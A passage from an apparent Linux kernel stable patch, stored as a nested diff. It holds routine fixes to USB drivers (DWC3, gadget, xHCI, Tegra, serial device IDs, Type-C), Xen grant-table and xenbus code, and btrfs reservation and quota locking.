+-		/*
+-		 * Enable Auto retry Feature to make the controller operating in
+-		 * Host mode on seeing transaction errors(CRC errors or internal
+-		 * overrun scenerios) on IN transfers to reply to the device
+-		 * with a non-terminating retry ACK (i.e, an ACK transcation
+-		 * packet with Retry=1 & Nump != 0)
+-		 */
+-		reg |= DWC3_GUCTL_HSTINAUTORETRY;
+-
+-		dwc3_writel(dwc->regs, DWC3_GUCTL, reg);
+-	}
+-
+ 	/*
+ 	 * Must config both number of packets and max burst settings to enable
+ 	 * RX and/or TX threshold.
+diff --git a/drivers/usb/dwc3/core.h b/drivers/usb/dwc3/core.h
+index bb57bc9bc17cb..80cc532ba9d55 100644
+--- a/drivers/usb/dwc3/core.h
++++ b/drivers/usb/dwc3/core.h
+@@ -254,9 +254,6 @@
+ #define DWC3_GCTL_GBLHIBERNATIONEN	BIT(1)
+ #define DWC3_GCTL_DSBLCLKGTNG		BIT(0)
+ 
+-/* Global User Control Register */
+-#define DWC3_GUCTL_HSTINAUTORETRY	BIT(14)
+-
+ /* Global User Control 1 Register */
+ #define DWC3_GUCTL1_DEV_DECOUPLE_L1L2_EVT	BIT(31)
+ #define DWC3_GUCTL1_TX_IPGAP_LINECHECK_DIS	BIT(28)
+diff --git a/drivers/usb/dwc3/dwc3-pci.c b/drivers/usb/dwc3/dwc3-pci.c
+index 560793545362a..ae25ee832ec03 100644
+--- a/drivers/usb/dwc3/dwc3-pci.c
++++ b/drivers/usb/dwc3/dwc3-pci.c
+@@ -233,10 +233,12 @@ static int dwc3_pci_quirks(struct dwc3_pci *dwc,
+ 
+ 			/*
+ 			 * A lot of BYT devices lack ACPI resource entries for
+-			 * the GPIOs, add a fallback mapping to the reference
++			 * the GPIOs. If the ACPI entry for the GPIO controller
++			 * is present add a fallback mapping to the reference
+ 			 * design GPIOs which all boards seem to use.
+ 			 */
+-			gpiod_add_lookup_table(&platform_bytcr_gpios);
++			if (acpi_dev_present("INT33FC", NULL, -1))
++				gpiod_add_lookup_table(&platform_bytcr_gpios);
+ 
+ 			/*
+ 			 * These GPIOs will turn on the USB2 PHY. Note that we have to
+diff --git a/drivers/usb/gadget/composite.c b/drivers/usb/gadget/composite.c
+index 403563c06477b..cb0a4e2cdbb73 100644
+--- a/drivers/usb/gadget/composite.c
++++ b/drivers/usb/gadget/composite.c
+@@ -1029,6 +1029,10 @@ int usb_add_config(struct usb_composite_dev *cdev,
+ 		goto done;
+ 
+ 	status = bind(config);
++
++	if (status == 0)
++		status = usb_gadget_check_config(cdev->gadget);
++
+ 	if (status < 0) {
+ 		while (!list_empty(&config->functions)) {
+ 			struct usb_function		*f;
+diff --git a/drivers/usb/gadget/legacy/raw_gadget.c b/drivers/usb/gadget/legacy/raw_gadget.c
+index 2acece16b8900..e549022642e56 100644
+--- a/drivers/usb/gadget/legacy/raw_gadget.c
++++ b/drivers/usb/gadget/legacy/raw_gadget.c
+@@ -310,13 +310,15 @@ static int gadget_bind(struct usb_gadget *gadget,
+ 	dev->eps_num = i;
+ 	spin_unlock_irqrestore(&dev->lock, flags);
+ 
+-	/* Matches kref_put() in gadget_unbind(). */
+-	kref_get(&dev->count);
+-
+ 	ret = raw_queue_event(dev, USB_RAW_EVENT_CONNECT, 0, NULL);
+-	if (ret < 0)
++	if (ret < 0) {
+ 		dev_err(&gadget->dev, "failed to queue event\n");
++		set_gadget_data(gadget, NULL);
++		return ret;
++	}
+ 
++	/* Matches kref_put() in gadget_unbind(). */
++	kref_get(&dev->count);
+ 	return ret;
+ }
+ 
+diff --git a/drivers/usb/gadget/udc/core.c b/drivers/usb/gadget/udc/core.c
+index 99f40611f459b..139f471894fb5 100644
+--- a/drivers/usb/gadget/udc/core.c
++++ b/drivers/usb/gadget/udc/core.c
+@@ -851,7 +851,6 @@ int usb_gadget_activate(struct usb_gadget *gadget)
+ 	 */
+ 	if (gadget->connected)
+ 		ret = usb_gadget_connect_locked(gadget);
+-	mutex_unlock(&gadget->udc->connect_lock);
+ 
+ unlock:
+ 	mutex_unlock(&gadget->udc->connect_lock);
+diff --git a/drivers/usb/gadget/udc/tegra-xudc.c b/drivers/usb/gadget/udc/tegra-xudc.c
+index 3c7ffb35c35cd..a8cadc45c65aa 100644
+--- a/drivers/usb/gadget/udc/tegra-xudc.c
++++ b/drivers/usb/gadget/udc/tegra-xudc.c
+@@ -3695,15 +3695,15 @@ static int tegra_xudc_powerdomain_init(struct tegra_xudc *xudc)
+ 	int err;
+ 
+ 	xudc->genpd_dev_device = dev_pm_domain_attach_by_name(dev, "dev");
+-	if (IS_ERR_OR_NULL(xudc->genpd_dev_device)) {
+-		err = PTR_ERR(xudc->genpd_dev_device) ? : -ENODATA;
++	if (IS_ERR(xudc->genpd_dev_device)) {
++		err = PTR_ERR(xudc->genpd_dev_device);
+ 		dev_err(dev, "failed to get device power domain: %d\n", err);
+ 		return err;
+ 	}
+ 
+ 	xudc->genpd_dev_ss = dev_pm_domain_attach_by_name(dev, "ss");
+-	if (IS_ERR_OR_NULL(xudc->genpd_dev_ss)) {
+-		err = PTR_ERR(xudc->genpd_dev_ss) ? : -ENODATA;
++	if (IS_ERR(xudc->genpd_dev_ss)) {
++		err = PTR_ERR(xudc->genpd_dev_ss);
+ 		dev_err(dev, "failed to get SuperSpeed power domain: %d\n", err);
+ 		return err;
+ 	}
+diff --git a/drivers/usb/host/ohci-at91.c b/drivers/usb/host/ohci-at91.c
+index 533537ef3c21d..360680769494b 100644
+--- a/drivers/usb/host/ohci-at91.c
++++ b/drivers/usb/host/ohci-at91.c
+@@ -673,7 +673,13 @@ ohci_hcd_at91_drv_resume(struct device *dev)
+ 	else
+ 		at91_start_clock(ohci_at91);
+ 
+-	ohci_resume(hcd, false);
++	/*
++	 * According to the comment in ohci_hcd_at91_drv_suspend()
++	 * we need to do a reset if the 48Mhz clock was stopped,
++	 * that is, if ohci_at91->wakeup is clear. Tell ohci_resume()
++	 * to reset in this case by setting its "hibernated" flag.
++	 */
++	ohci_resume(hcd, !ohci_at91->wakeup);
+ 
+ 	return 0;
+ }
+diff --git a/drivers/usb/host/xhci-mtk.c b/drivers/usb/host/xhci-mtk.c
+index c61fc19ef1154..a0921687444b1 100644
+--- a/drivers/usb/host/xhci-mtk.c
++++ b/drivers/usb/host/xhci-mtk.c
+@@ -590,6 +590,7 @@ static int xhci_mtk_probe(struct platform_device *pdev)
+ 	}
+ 
+ 	device_init_wakeup(dev, true);
++	dma_set_max_seg_size(dev, UINT_MAX);
+ 
+ 	xhci = hcd_to_xhci(hcd);
+ 	xhci->main_hcd = hcd;
+diff --git a/drivers/usb/host/xhci-pci.c b/drivers/usb/host/xhci-pci.c
+index 5e72d02042ced..2aed88c28ef69 100644
+--- a/drivers/usb/host/xhci-pci.c
++++ b/drivers/usb/host/xhci-pci.c
+@@ -293,10 +293,8 @@ static void xhci_pci_quirks(struct device *dev, struct xhci_hcd *xhci)
+ 			pdev->device == 0x3432)
+ 		xhci->quirks |= XHCI_BROKEN_STREAMS;
+ 
+-	if (pdev->vendor == PCI_VENDOR_ID_VIA && pdev->device == 0x3483) {
++	if (pdev->vendor == PCI_VENDOR_ID_VIA && pdev->device == 0x3483)
+ 		xhci->quirks |= XHCI_LPM_SUPPORT;
+-		xhci->quirks |= XHCI_EP_CTX_BROKEN_DCS;
+-	}
+ 
+ 	if (pdev->vendor == PCI_VENDOR_ID_ASMEDIA &&
+ 		pdev->device == PCI_DEVICE_ID_ASMEDIA_1042_XHCI) {
+diff --git a/drivers/usb/host/xhci-ring.c b/drivers/usb/host/xhci-ring.c
+index 7a7ab525675b7..281690c582cba 100644
+--- a/drivers/usb/host/xhci-ring.c
++++ b/drivers/usb/host/xhci-ring.c
+@@ -592,11 +592,8 @@ static int xhci_move_dequeue_past_td(struct xhci_hcd *xhci,
+ 	struct xhci_ring *ep_ring;
+ 	struct xhci_command *cmd;
+ 	struct xhci_segment *new_seg;
+-	struct xhci_segment *halted_seg = NULL;
+ 	union xhci_trb *new_deq;
+ 	int new_cycle;
+-	union xhci_trb *halted_trb;
+-	int index = 0;
+ 	dma_addr_t addr;
+ 	u64 hw_dequeue;
+ 	bool cycle_found = false;
+@@ -634,27 +631,7 @@ static int xhci_move_dequeue_past_td(struct xhci_hcd *xhci,
+ 	hw_dequeue = xhci_get_hw_deq(xhci, dev, ep_index, stream_id);
+ 	new_seg = ep_ring->deq_seg;
+ 	new_deq = ep_ring->dequeue;
+-
+-	/*
+-	 * Quirk: xHC write-back of the DCS field in the hardware dequeue
+-	 * pointer is wrong - use the cycle state of the TRB pointed to by
+-	 * the dequeue pointer.
+-	 */
+-	if (xhci->quirks & XHCI_EP_CTX_BROKEN_DCS &&
+-	    !(ep->ep_state & EP_HAS_STREAMS))
+-		halted_seg = trb_in_td(xhci, td->start_seg,
+-				       td->first_trb, td->last_trb,
+-				       hw_dequeue & ~0xf, false);
+-	if (halted_seg) {
+-		index = ((dma_addr_t)(hw_dequeue & ~0xf) - halted_seg->dma) /
+-			 sizeof(*halted_trb);
+-		halted_trb = &halted_seg->trbs[index];
+-		new_cycle = halted_trb->generic.field[3] & 0x1;
+-		xhci_dbg(xhci, "Endpoint DCS = %d TRB index = %d cycle = %d\n",
+-			 (u8)(hw_dequeue & 0x1), index, new_cycle);
+-	} else {
+-		new_cycle = hw_dequeue & 0x1;
+-	}
++	new_cycle = hw_dequeue & 0x1;
+ 
+ 	/*
+ 	 * We want to find the pointer, segment and cycle state of the new trb
+diff --git a/drivers/usb/host/xhci-tegra.c b/drivers/usb/host/xhci-tegra.c
+index 32df571bb2339..51eabc5e87701 100644
+--- a/drivers/usb/host/xhci-tegra.c
++++ b/drivers/usb/host/xhci-tegra.c
+@@ -1010,15 +1010,15 @@ static int tegra_xusb_powerdomain_init(struct device *dev,
+ 	int err;
+ 
+ 	tegra->genpd_dev_host = dev_pm_domain_attach_by_name(dev, "xusb_host");
+-	if (IS_ERR_OR_NULL(tegra->genpd_dev_host)) {
+-		err = PTR_ERR(tegra->genpd_dev_host) ? : -ENODATA;
++	if (IS_ERR(tegra->genpd_dev_host)) {
++		err = PTR_ERR(tegra->genpd_dev_host);
+ 		dev_err(dev, "failed to get host pm-domain: %d\n", err);
+ 		return err;
+ 	}
+ 
+ 	tegra->genpd_dev_ss = dev_pm_domain_attach_by_name(dev, "xusb_ss");
+-	if (IS_ERR_OR_NULL(tegra->genpd_dev_ss)) {
+-		err = PTR_ERR(tegra->genpd_dev_ss) ? : -ENODATA;
++	if (IS_ERR(tegra->genpd_dev_ss)) {
++		err = PTR_ERR(tegra->genpd_dev_ss);
+ 		dev_err(dev, "failed to get superspeed pm-domain: %d\n", err);
+ 		return err;
+ 	}
+diff --git a/drivers/usb/misc/ehset.c b/drivers/usb/misc/ehset.c
+index 986d6589f0535..36b6e9fa7ffb6 100644
+--- a/drivers/usb/misc/ehset.c
++++ b/drivers/usb/misc/ehset.c
+@@ -77,7 +77,7 @@ static int ehset_probe(struct usb_interface *intf,
+ 	switch (test_pid) {
+ 	case TEST_SE0_NAK_PID:
+ 		ret = ehset_prepare_port_for_testing(hub_udev, portnum);
+-		if (!ret)
++		if (ret < 0)
+ 			break;
+ 		ret = usb_control_msg_send(hub_udev, 0, USB_REQ_SET_FEATURE,
+ 					   USB_RT_PORT, USB_PORT_FEAT_TEST,
+@@ -86,7 +86,7 @@ static int ehset_probe(struct usb_interface *intf,
+ 		break;
+ 	case TEST_J_PID:
+ 		ret = ehset_prepare_port_for_testing(hub_udev, portnum);
+-		if (!ret)
++		if (ret < 0)
+ 			break;
+ 		ret = usb_control_msg_send(hub_udev, 0, USB_REQ_SET_FEATURE,
+ 					   USB_RT_PORT, USB_PORT_FEAT_TEST,
+@@ -95,7 +95,7 @@ static int ehset_probe(struct usb_interface *intf,
+ 		break;
+ 	case TEST_K_PID:
+ 		ret = ehset_prepare_port_for_testing(hub_udev, portnum);
+-		if (!ret)
++		if (ret < 0)
+ 			break;
+ 		ret = usb_control_msg_send(hub_udev, 0, USB_REQ_SET_FEATURE,
+ 					   USB_RT_PORT, USB_PORT_FEAT_TEST,
+@@ -104,7 +104,7 @@ static int ehset_probe(struct usb_interface *intf,
+ 		break;
+ 	case TEST_PACKET_PID:
+ 		ret = ehset_prepare_port_for_testing(hub_udev, portnum);
+-		if (!ret)
++		if (ret < 0)
+ 			break;
+ 		ret = usb_control_msg_send(hub_udev, 0, USB_REQ_SET_FEATURE,
+ 					   USB_RT_PORT, USB_PORT_FEAT_TEST,
+diff --git a/drivers/usb/serial/option.c b/drivers/usb/serial/option.c
+index 6692440c1e0a3..119641761c3b4 100644
+--- a/drivers/usb/serial/option.c
++++ b/drivers/usb/serial/option.c
+@@ -251,6 +251,7 @@ static void option_instat_callback(struct urb *urb);
+ #define QUECTEL_PRODUCT_EM061K_LTA		0x0123
+ #define QUECTEL_PRODUCT_EM061K_LMS		0x0124
+ #define QUECTEL_PRODUCT_EC25			0x0125
++#define QUECTEL_PRODUCT_EM060K_128		0x0128
+ #define QUECTEL_PRODUCT_EG91			0x0191
+ #define QUECTEL_PRODUCT_EG95			0x0195
+ #define QUECTEL_PRODUCT_BG96			0x0296
+@@ -268,6 +269,7 @@ static void option_instat_callback(struct urb *urb);
+ #define QUECTEL_PRODUCT_RM520N			0x0801
+ #define QUECTEL_PRODUCT_EC200U			0x0901
+ #define QUECTEL_PRODUCT_EC200S_CN		0x6002
++#define QUECTEL_PRODUCT_EC200A			0x6005
+ #define QUECTEL_PRODUCT_EM061K_LWW		0x6008
+ #define QUECTEL_PRODUCT_EM061K_LCN		0x6009
+ #define QUECTEL_PRODUCT_EC200T			0x6026
+@@ -1197,6 +1199,9 @@ static const struct usb_device_id option_ids[] = {
+ 	{ USB_DEVICE_AND_INTERFACE_INFO(QUECTEL_VENDOR_ID, QUECTEL_PRODUCT_EM060K, 0xff, 0x00, 0x40) },
+ 	{ USB_DEVICE_AND_INTERFACE_INFO(QUECTEL_VENDOR_ID, QUECTEL_PRODUCT_EM060K, 0xff, 0xff, 0x30) },
+ 	{ USB_DEVICE_AND_INTERFACE_INFO(QUECTEL_VENDOR_ID, QUECTEL_PRODUCT_EM060K, 0xff, 0xff, 0x40) },
++	{ USB_DEVICE_AND_INTERFACE_INFO(QUECTEL_VENDOR_ID, QUECTEL_PRODUCT_EM060K_128, 0xff, 0xff, 0x30) },
++	{ USB_DEVICE_AND_INTERFACE_INFO(QUECTEL_VENDOR_ID, QUECTEL_PRODUCT_EM060K_128, 0xff, 0x00, 0x40) },
++	{ USB_DEVICE_AND_INTERFACE_INFO(QUECTEL_VENDOR_ID, QUECTEL_PRODUCT_EM060K_128, 0xff, 0xff, 0x40) },
+ 	{ USB_DEVICE_AND_INTERFACE_INFO(QUECTEL_VENDOR_ID, QUECTEL_PRODUCT_EM061K_LCN, 0xff, 0xff, 0x30) },
+ 	{ USB_DEVICE_AND_INTERFACE_INFO(QUECTEL_VENDOR_ID, QUECTEL_PRODUCT_EM061K_LCN, 0xff, 0x00, 0x40) },
+ 	{ USB_DEVICE_AND_INTERFACE_INFO(QUECTEL_VENDOR_ID, QUECTEL_PRODUCT_EM061K_LCN, 0xff, 0xff, 0x40) },
+@@ -1225,6 +1230,7 @@ static const struct usb_device_id option_ids[] = {
+ 	{ USB_DEVICE_AND_INTERFACE_INFO(QUECTEL_VENDOR_ID, QUECTEL_PRODUCT_RM520N, 0xff, 0, 0) },
+ 	{ USB_DEVICE_AND_INTERFACE_INFO(QUECTEL_VENDOR_ID, 0x0900, 0xff, 0, 0), /* RM500U-CN */
+ 	  .driver_info = ZLP },
++	{ USB_DEVICE_AND_INTERFACE_INFO(QUECTEL_VENDOR_ID, QUECTEL_PRODUCT_EC200A, 0xff, 0, 0) },
+ 	{ USB_DEVICE_AND_INTERFACE_INFO(QUECTEL_VENDOR_ID, QUECTEL_PRODUCT_EC200U, 0xff, 0, 0) },
+ 	{ USB_DEVICE_AND_INTERFACE_INFO(QUECTEL_VENDOR_ID, QUECTEL_PRODUCT_EC200S_CN, 0xff, 0, 0) },
+ 	{ USB_DEVICE_AND_INTERFACE_INFO(QUECTEL_VENDOR_ID, QUECTEL_PRODUCT_EC200T, 0xff, 0, 0) },
+diff --git a/drivers/usb/serial/usb-serial-simple.c b/drivers/usb/serial/usb-serial-simple.c
+index 4c6747889a194..24b8772a345e2 100644
+--- a/drivers/usb/serial/usb-serial-simple.c
++++ b/drivers/usb/serial/usb-serial-simple.c
+@@ -38,16 +38,6 @@ static struct usb_serial_driver vendor##_device = {		\
+ 	{ USB_DEVICE(0x0a21, 0x8001) }	/* MMT-7305WW */
+ DEVICE(carelink, CARELINK_IDS);
+ 
+-/* ZIO Motherboard USB driver */
+-#define ZIO_IDS()			\
+-	{ USB_DEVICE(0x1CBE, 0x0103) }
+-DEVICE(zio, ZIO_IDS);
+-
+-/* Funsoft Serial USB driver */
+-#define FUNSOFT_IDS()			\
+-	{ USB_DEVICE(0x1404, 0xcddc) }
+-DEVICE(funsoft, FUNSOFT_IDS);
+-
+ /* Infineon Flashloader driver */
+ #define FLASHLOADER_IDS()		\
+ 	{ USB_DEVICE_INTERFACE_CLASS(0x058b, 0x0041, USB_CLASS_CDC_DATA) }, \
+@@ -55,6 +45,11 @@ DEVICE(funsoft, FUNSOFT_IDS);
+ 	{ USB_DEVICE(0x8087, 0x0801) }
+ DEVICE(flashloader, FLASHLOADER_IDS);
+ 
++/* Funsoft Serial USB driver */
++#define FUNSOFT_IDS()			\
++	{ USB_DEVICE(0x1404, 0xcddc) }
++DEVICE(funsoft, FUNSOFT_IDS);
++
+ /* Google Serial USB SubClass */
+ #define GOOGLE_IDS()						\
+ 	{ USB_VENDOR_AND_INTERFACE_INFO(0x18d1,			\
+@@ -63,16 +58,21 @@ DEVICE(flashloader, FLASHLOADER_IDS);
+ 					0x01) }
+ DEVICE(google, GOOGLE_IDS);
+ 
++/* HP4x (48/49) Generic Serial driver */
++#define HP4X_IDS()			\
++	{ USB_DEVICE(0x03f0, 0x0121) }
++DEVICE(hp4x, HP4X_IDS);
++
++/* KAUFMANN RKS+CAN VCP */
++#define KAUFMANN_IDS()			\
++	{ USB_DEVICE(0x16d0, 0x0870) }
++DEVICE(kaufmann, KAUFMANN_IDS);
++
+ /* Libtransistor USB console */
+ #define LIBTRANSISTOR_IDS()			\
+ 	{ USB_DEVICE(0x1209, 0x8b00) }
+ DEVICE(libtransistor, LIBTRANSISTOR_IDS);
+ 
+-/* ViVOpay USB Serial Driver */
+-#define VIVOPAY_IDS()			\
+-	{ USB_DEVICE(0x1d5f, 0x1004) }	/* ViVOpay 8800 */
+-DEVICE(vivopay, VIVOPAY_IDS);
+-
+ /* Motorola USB Phone driver */
+ #define MOTO_IDS()			\
+ 	{ USB_DEVICE(0x05c6, 0x3197) },	/* unknown Motorola phone */	\
+@@ -101,10 +101,10 @@ DEVICE(nokia, NOKIA_IDS);
+ 	{ USB_DEVICE(0x09d7, 0x0100) }	/* NovAtel FlexPack GPS */
+ DEVICE_N(novatel_gps, NOVATEL_IDS, 3);
+ 
+-/* HP4x (48/49) Generic Serial driver */
+-#define HP4X_IDS()			\
+-	{ USB_DEVICE(0x03f0, 0x0121) }
+-DEVICE(hp4x, HP4X_IDS);
++/* Siemens USB/MPI adapter */
++#define SIEMENS_IDS()			\
++	{ USB_DEVICE(0x908, 0x0004) }
++DEVICE(siemens_mpi, SIEMENS_IDS);
+ 
+ /* Suunto ANT+ USB Driver */
+ #define SUUNTO_IDS()			\
+@@ -112,45 +112,52 @@ DEVICE(hp4x, HP4X_IDS);
+ 	{ USB_DEVICE(0x0fcf, 0x1009) } /* Dynastream ANT USB-m Stick */
+ DEVICE(suunto, SUUNTO_IDS);
+ 
+-/* Siemens USB/MPI adapter */
+-#define SIEMENS_IDS()			\
+-	{ USB_DEVICE(0x908, 0x0004) }
+-DEVICE(siemens_mpi, SIEMENS_IDS);
++/* ViVOpay USB Serial Driver */
++#define VIVOPAY_IDS()			\
++	{ USB_DEVICE(0x1d5f, 0x1004) }	/* ViVOpay 8800 */
++DEVICE(vivopay, VIVOPAY_IDS);
++
++/* ZIO Motherboard USB driver */
++#define ZIO_IDS()			\
++	{ USB_DEVICE(0x1CBE, 0x0103) }
++DEVICE(zio, ZIO_IDS);
+ 
+ /* All of the above structures mushed into two lists */
+ static struct usb_serial_driver * const serial_drivers[] = {
+ 	&carelink_device,
+-	&zio_device,
+-	&funsoft_device,
+ 	&flashloader_device,
++	&funsoft_device,
+ 	&google_device,
++	&hp4x_device,
++	&kaufmann_device,
+ 	&libtransistor_device,
+-	&vivopay_device,
+ 	&moto_modem_device,
+ 	&motorola_tetra_device,
+ 	&nokia_device,
+ 	&novatel_gps_device,
+-	&hp4x_device,
+-	&suunto_device,
+ 	&siemens_mpi_device,
++	&suunto_device,
++	&vivopay_device,
++	&zio_device,
+ 	NULL
+ };
+ 
+ static const struct usb_device_id id_table[] = {
+ 	CARELINK_IDS(),
+-	ZIO_IDS(),
+-	FUNSOFT_IDS(),
+ 	FLASHLOADER_IDS(),
++	FUNSOFT_IDS(),
+ 	GOOGLE_IDS(),
++	HP4X_IDS(),
++	KAUFMANN_IDS(),
+ 	LIBTRANSISTOR_IDS(),
+-	VIVOPAY_IDS(),
+ 	MOTO_IDS(),
+ 	MOTOROLA_TETRA_IDS(),
+ 	NOKIA_IDS(),
+ 	NOVATEL_IDS(),
+-	HP4X_IDS(),
+-	SUUNTO_IDS(),
+ 	SIEMENS_IDS(),
++	SUUNTO_IDS(),
++	VIVOPAY_IDS(),
++	ZIO_IDS(),
+ 	{ },
+ };
+ MODULE_DEVICE_TABLE(usb, id_table);
+diff --git a/drivers/usb/typec/class.c b/drivers/usb/typec/class.c
+index bd5e5dd704313..3c3bab33e03a5 100644
+--- a/drivers/usb/typec/class.c
++++ b/drivers/usb/typec/class.c
+@@ -1258,8 +1258,7 @@ static ssize_t select_usb_power_delivery_show(struct device *dev,
+ {
+ 	struct typec_port *port = to_typec_port(dev);
+ 	struct usb_power_delivery **pds;
+-	struct usb_power_delivery *pd;
+-	int ret = 0;
++	int i, ret = 0;
+ 
+ 	if (!port->ops || !port->ops->pd_get)
+ 		return -EOPNOTSUPP;
+@@ -1268,11 +1267,11 @@ static ssize_t select_usb_power_delivery_show(struct device *dev,
+ 	if (!pds)
+ 		return 0;
+ 
+-	for (pd = pds[0]; pd; pd++) {
+-		if (pd == port->pd)
+-			ret += sysfs_emit(buf + ret, "[%s] ", dev_name(&pd->dev));
++	for (i = 0; pds[i]; i++) {
++		if (pds[i] == port->pd)
++			ret += sysfs_emit_at(buf, ret, "[%s] ", dev_name(&pds[i]->dev));
+ 		else
+-			ret += sysfs_emit(buf + ret, "%s ", dev_name(&pd->dev));
++			ret += sysfs_emit_at(buf, ret, "%s ", dev_name(&pds[i]->dev));
+ 	}
+ 
+ 	buf[ret - 1] = '\n';
+@@ -2259,6 +2258,8 @@ struct typec_port *typec_register_port(struct device *parent,
+ 		return ERR_PTR(ret);
+ 	}
+ 
++	port->pd = cap->pd;
++
+ 	ret = device_add(&port->dev);
+ 	if (ret) {
+ 		dev_err(parent, "failed to register port (%d)\n", ret);
+@@ -2266,7 +2267,7 @@ struct typec_port *typec_register_port(struct device *parent,
+ 		return ERR_PTR(ret);
+ 	}
+ 
+-	ret = typec_port_set_usb_power_delivery(port, cap->pd);
++	ret = usb_power_delivery_link_device(port->pd, &port->dev);
+ 	if (ret) {
+ 		dev_err(&port->dev, "failed to link pd\n");
+ 		device_unregister(&port->dev);
+diff --git a/drivers/xen/grant-table.c b/drivers/xen/grant-table.c
+index e1ec725c2819d..f13c3b76ad1eb 100644
+--- a/drivers/xen/grant-table.c
++++ b/drivers/xen/grant-table.c
+@@ -498,14 +498,21 @@ static LIST_HEAD(deferred_list);
+ static void gnttab_handle_deferred(struct timer_list *);
+ static DEFINE_TIMER(deferred_timer, gnttab_handle_deferred);
+ 
++static atomic64_t deferred_count;
++static atomic64_t leaked_count;
++static unsigned int free_per_iteration = 10;
++module_param(free_per_iteration, uint, 0600);
++
+ static void gnttab_handle_deferred(struct timer_list *unused)
+ {
+-	unsigned int nr = 10;
++	unsigned int nr = READ_ONCE(free_per_iteration);
++	const bool ignore_limit = nr == 0;
+ 	struct deferred_entry *first = NULL;
+ 	unsigned long flags;
++	size_t freed = 0;
+ 
+ 	spin_lock_irqsave(&gnttab_list_lock, flags);
+-	while (nr--) {
++	while ((ignore_limit || nr--) && !list_empty(&deferred_list)) {
+ 		struct deferred_entry *entry
+ 			= list_first_entry(&deferred_list,
+ 					   struct deferred_entry, list);
+@@ -515,10 +522,14 @@ static void gnttab_handle_deferred(struct timer_list *unused)
+ 		list_del(&entry->list);
+ 		spin_unlock_irqrestore(&gnttab_list_lock, flags);
+ 		if (_gnttab_end_foreign_access_ref(entry->ref)) {
++			uint64_t ret = atomic64_dec_return(&deferred_count);
++
+ 			put_free_entry(entry->ref);
+-			pr_debug("freeing g.e. %#x (pfn %#lx)\n",
+-				 entry->ref, page_to_pfn(entry->page));
++			pr_debug("freeing g.e. %#x (pfn %#lx), %llu remaining\n",
++				 entry->ref, page_to_pfn(entry->page),
++				 (unsigned long long)ret);
+ 			put_page(entry->page);
++			freed++;
+ 			kfree(entry);
+ 			entry = NULL;
+ 		} else {
+@@ -530,21 +541,22 @@ static void gnttab_handle_deferred(struct timer_list *unused)
+ 		spin_lock_irqsave(&gnttab_list_lock, flags);
+ 		if (entry)
+ 			list_add_tail(&entry->list, &deferred_list);
+-		else if (list_empty(&deferred_list))
+-			break;
+ 	}
+-	if (!list_empty(&deferred_list) && !timer_pending(&deferred_timer)) {
++	if (list_empty(&deferred_list))
++		WARN_ON(atomic64_read(&deferred_count));
++	else if (!timer_pending(&deferred_timer)) {
+ 		deferred_timer.expires = jiffies + HZ;
+ 		add_timer(&deferred_timer);
+ 	}
+ 	spin_unlock_irqrestore(&gnttab_list_lock, flags);
++	pr_debug("Freed %zu references", freed);
+ }
+ 
+ static void gnttab_add_deferred(grant_ref_t ref, struct page *page)
+ {
+ 	struct deferred_entry *entry;
+ 	gfp_t gfp = (in_atomic() || irqs_disabled()) ? GFP_ATOMIC : GFP_KERNEL;
+-	const char *what = KERN_WARNING "leaking";
++	uint64_t leaked, deferred;
+ 
+ 	entry = kmalloc(sizeof(*entry), gfp);
+ 	if (!page) {
+@@ -567,10 +579,16 @@ static void gnttab_add_deferred(grant_ref_t ref, struct page *page)
+ 			add_timer(&deferred_timer);
+ 		}
+ 		spin_unlock_irqrestore(&gnttab_list_lock, flags);
+-		what = KERN_DEBUG "deferring";
++		deferred = atomic64_inc_return(&deferred_count);
++		leaked = atomic64_read(&leaked_count);
++		pr_debug("deferring g.e. %#x (pfn %#lx) (total deferred %llu, total leaked %llu)\n",
++			 ref, page ? page_to_pfn(page) : -1, deferred, leaked);
++	} else {
++		deferred = atomic64_read(&deferred_count);
++		leaked = atomic64_inc_return(&leaked_count);
++		pr_warn("leaking g.e. %#x (pfn %#lx) (total deferred %llu, total leaked %llu)\n",
++			ref, page ? page_to_pfn(page) : -1, deferred, leaked);
+ 	}
+-	printk("%s g.e. %#x (pfn %#lx)\n",
+-	       what, ref, page ? page_to_pfn(page) : -1);
+ }
+ 
+ int gnttab_try_end_foreign_access(grant_ref_t ref)
+diff --git a/drivers/xen/xenbus/xenbus_probe.c b/drivers/xen/xenbus/xenbus_probe.c
+index 58b732dcbfb83..639bf628389ba 100644
+--- a/drivers/xen/xenbus/xenbus_probe.c
++++ b/drivers/xen/xenbus/xenbus_probe.c
+@@ -811,6 +811,9 @@ static int xenbus_probe_thread(void *unused)
+ 
+ static int __init xenbus_probe_initcall(void)
+ {
++	if (!xen_domain())
++		return -ENODEV;
++
+ 	/*
+ 	 * Probe XenBus here in the XS_PV case, and also XS_HVM unless we
+ 	 * need to wait for the platform PCI device to come up or
+diff --git a/fs/btrfs/block-rsv.c b/fs/btrfs/block-rsv.c
+index 2044f1e186297..507b44d18572d 100644
+--- a/fs/btrfs/block-rsv.c
++++ b/fs/btrfs/block-rsv.c
+@@ -377,6 +377,11 @@ void btrfs_update_global_block_rsv(struct btrfs_fs_info *fs_info)
+ 	}
+ 	read_unlock(&fs_info->global_root_lock);
+ 
++	if (btrfs_fs_compat_ro(fs_info, BLOCK_GROUP_TREE)) {
++		num_bytes += btrfs_root_used(&fs_info->block_group_root->root_item);
++		min_items++;
++	}
++
+ 	/*
+ 	 * But we also want to reserve enough space so we can do the fallback
+ 	 * global reserve for an unlink, which is an additional 5 items (see the
+diff --git a/fs/btrfs/qgroup.c b/fs/btrfs/qgroup.c
+index cacdb2c5d1528..26cabffd59710 100644
+--- a/fs/btrfs/qgroup.c
++++ b/fs/btrfs/qgroup.c
+@@ -1227,12 +1227,23 @@ int btrfs_quota_disable(struct btrfs_fs_info *fs_info)
+ 	int ret = 0;
+ 
+ 	/*
+-	 * We need to have subvol_sem write locked, to prevent races between
+-	 * concurrent tasks trying to disable quotas, because we will unlock
+-	 * and relock qgroup_ioctl_lock across BTRFS_FS_QUOTA_ENABLED changes.
++	 * We need to have subvol_sem write locked to prevent races with
++	 * snapshot creation.
+ 	 */
+ 	lockdep_assert_held_write(&fs_info->subvol_sem);
+ 
++	/*
++	 * Lock the cleaner mutex to prevent races with concurrent relocation,
++	 * because relocation may be building backrefs for blocks of the quota
++	 * root while we are deleting the root. This is like dropping fs roots
++	 * of deleted snapshots/subvolumes, we need the same protection.
++	 *
++	 * This also prevents races between concurrent tasks trying to disable
++	 * quotas, because we will unlock and relock qgroup_ioctl_lock across
++	 * BTRFS_FS_QUOTA_ENABLED changes.
++	 */
++	mutex_lock(&fs_info->cleaner_mutex);
++
+ 	mutex_lock(&fs_info->qgroup_ioctl_lock);
